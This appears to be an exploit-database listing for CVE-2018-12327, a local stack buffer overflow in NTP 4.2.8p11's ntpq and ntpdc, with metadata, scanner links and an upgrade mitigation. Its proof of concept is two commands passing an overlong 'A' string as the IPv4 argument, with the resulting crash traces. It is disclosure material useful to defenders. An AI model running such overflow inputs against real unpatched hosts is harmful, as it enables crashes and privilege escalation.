header-logo
Suggest Exploit
vendor:
NTP
by:
Fakhri Zulkifli
9.8
CVSS
CRITICAL
Buffer Overflow
119
CWE
Product Name: NTP
Affected Version From: 4.2.8p11
Affected Version To: 4.2.8p11
Patch Exists: YES
Related CWE: CVE-2018-12327
CPE: a:ntp:ntp:4.2.8p11
Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/ntp-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/ibm-aix-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2018-12327/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2018-12327/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=119791https://www.infosecmatter.com/nessus-plugin-library/?id=118357https://www.infosecmatter.com/nessus-plugin-library/?id=118352https://www.infosecmatter.com/nessus-plugin-library/?id=112223https://www.infosecmatter.com/nessus-plugin-library/?id=119823https://www.infosecmatter.com/nessus-plugin-library/?id=132434https://www.infosecmatter.com/nessus-plugin-library/?id=119796https://www.infosecmatter.com/nessus-plugin-library/?id=144545https://www.infosecmatter.com/nessus-plugin-library/?id=128347https://www.infosecmatter.com/nessus-plugin-library/?id=111968
Platforms Tested: 4.2.8p11
2018

ntpq and ntpdc 4.2.8p11 Local Buffer Overflow

Stack-based buffer overflow in ntpq and ntpdc of NTP version 4.2.8p11 allows a local attacker to achieve code execution or escalate to higher privileges via a long string as the argument for an IPv4 or IPv6 command-line parameter.

Mitigation:

Upgrade to the latest version of NTP.
Source

Exploit-DB raw data:

# Exploit Title: ntpq and ntpdc 4.2.8p11 Local Buffer Overflow
# Date: 2018-06-06
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: http://www.ntp.org/
# Software Link: http://www.ntp.org/downloads.html
# Version: 4.2.8p11 and earlier
# Tested on: 4.2.8p11
# CVE : CVE-2018-12327

Stack-based buffer overflow in ntpq and ntpdc of NTP version 4.2.8p11 allows a local attacker to achieve code execution or escalate to higher privileges via a long string as the argument for an IPv4 or IPv6 command-line parameter.

$ ./ntpq -4 [`python -c 'print "A" * 300’`]

#0 0x562fcada86ce in openhost /home/user/ntp-4.2.8p11/ntpq/ntpq.c:655:12
#1 0x562fcada5f2a in ntpqmain /home/user/ntp-4.2.8p11/ntpq/ntpq.c:606:10
#2 0x562fcada4729 in main /home/user/ntp-4.2.8p11/ntpq/ntpq.c:469:9
#3 0x7f79b684982f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x562fcac96d88 in _start (/home/user/ntp-4.2.8p11/ntpq/ntpq+0xacd88)

$ ./ntpdc -4 [`python -c 'print "A" * 300'`]

#0 0x55f726641efe in openhost /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:413:12
#1 0x55f7266400d4 in ntpdcmain /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:365:10
#2 0x55f72663f269 in main /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:255:9
#3 0x7f0fc632382f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x55f7265362d8 in _start (/home/user/ntp-4.2.8p11/ntpdc/ntpdc+0x9d2d8)

Navigation

Suggest Exploit

Services By CQR